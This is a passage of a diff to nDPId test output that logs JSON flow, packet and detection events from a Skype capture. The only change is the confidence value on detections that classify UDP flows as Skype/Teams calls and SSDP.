00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.173","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1431970647810,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970647810,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6zV0AAEARYhbAqAEi1cezrTLdnE0AJlZnes0Ccg7v+3Lfid3osaqIFpFm\/v4o\/QqgzaHMxbGQ"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":562,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.173","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":562,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.173","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":563,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.167","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1431970647810,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970647810,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1vrcAAEARJFjAqAEinTc4pzLdnFgAIREees8CCCEtcEeglQLd7mhp21iK7rcni5fedw=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.167","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.167","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1431970647810,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970647810,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9vysAAEARohHAqAEiQAQXpTLdnEQAKTALetECX1BVIaBDDxsr7kKWybF1ggh0MeIv40Hl0rhawj9H"} -00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":565,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1431970647810,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970647810,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4G6EAAEARfQHAqAEiQTffETLdnFkAJOrWetMCvMga3ljFR4ptkQ1XTBYwQJAI0\/6MTBVdPQ=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":565,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":565,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":566,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1431970647810,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970647810,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1FVUAAEARg0\/AqAEiQTffEjLdgQkAIczZetUCcHkMN3GT\/RrB0G0KocMuGJme8meMAw=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":566,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":566,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648367,"flow_last_seen":1431970648367,"flow_idle_time":200000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1431970648367,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1431970648367,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1431970648367,"pkt":"AQBef\/\/6oPPBbTu2CABFAAE\/BH4AAAQR\/4\/AqAD+7\/\/\/+gQBB2wBK+71Tk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHVwbnA6cm9vdGRldmljZQ0KTlRTOiBzc2RwOmFsaXZlDQpTRVJWRVI6IFRQLUxJTksgV2lyZWxlc3MgTiBOYW5vIFJvdXRlciBXUjcwMk4sIFVQblAvMS4wDQpVU046IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxOjp1cG5wOnJvb3RkZXZpY2UNCg0K"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":567,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648367,"flow_last_seen":1431970648367,"flow_idle_time":200000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1431970648367,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":567,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648367,"flow_last_seen":1431970648367,"flow_idle_time":200000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"thread_ts_msec":1431970648367,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1431970648368,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":351,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":351,"pkt_l4_len":317,"thread_ts_msec":1431970648368,"pkt":"AQBef\/\/6oPPBbTu2CABFAAFRBH8AAAQR\/3zAqAD+7\/\/\/+gQBB2wBPQhzTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxDQpOVFM6IHNzZHA6YWxpdmUNClNFUlZFUjogVFAtTElOSyBXaXJlbGVzcyBOIE5hbm8gUm91dGVyIFdSNzAyTiwgVVBuUC8xLjANClVTTjogdXVpZDp1cG5wLUludGVybmV0R2F0ZXdheURldmljZS0xOTIxNjgwMjU0Nzg5MDAwMDENCg0K"} 00936{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1431970648368,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":405,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":405,"pkt_l4_len":371,"thread_ts_msec":1431970648368,"pkt":"AQBef\/\/6oPPBbTu2CABFAAGHBIAAAAQR\/0XAqAD+7\/\/\/+gQBB2wBc+ePTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpJbnRlcm5ldEdhdGV3YXlEZXZpY2U6MQ0KTlRTOiBzc2RwOmFsaXZlDQpTRVJWRVI6IFRQLUxJTksgV2lyZWxlc3MgTiBOYW5vIFJvdXRlciBXUjcwMk4sIFVQblAvMS4wDQpVU046IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxOjp1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCg0K"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.32","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1431970648822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970648822,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/tTsAAEAR41DAqAEiQTffIDLdnFYAK5o2etcCQsTVfNgeznDqGm3ssKnJOluDwQd072c+I4wlse7Ecr8="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.32","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.32","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1431970648822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970648822,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+1vAAAEARJ\/bAqAEib91KITLdnEsAKklketkCS\/KCvZwmcOx3xDmHrpkfhUG8CXubM92mElOOFhZFlQ=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":591,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":591,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1431970648822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970648822,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6md0AAEARSUPAqAEinTc4kTLdnEgAJsmIetsCpJOMytcJAiTHtz9O4hYGu7tAbRVxbii4hHFE"} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":592,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1431970648822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970648822,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5n+IAAEAR+MLAqAEiQTffDTLdnEkAJdiCet0C1RhCM\/VIp+W5EaRfz2WprIWREBw71gUfrFc="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 